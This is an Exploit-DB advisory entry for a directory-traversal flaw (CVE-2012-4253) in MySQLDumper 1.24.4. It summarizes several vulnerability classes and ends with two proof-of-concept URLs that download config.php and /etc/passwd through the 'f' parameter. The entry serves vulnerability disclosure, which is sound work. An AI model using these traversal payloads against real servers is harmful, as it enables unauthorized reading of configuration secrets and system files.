MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access

2012-04-27T00:00:00
ID EDB-ID:37129
Type exploitdb
Reporter AkaStep
Modified 2012-04-27T00:00:00

Description

MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access. CVE-2012-4253. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/53306/info
    
MySQLDumper is prone to multiple security vulnerabilities, including:
    
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
    
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
    
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00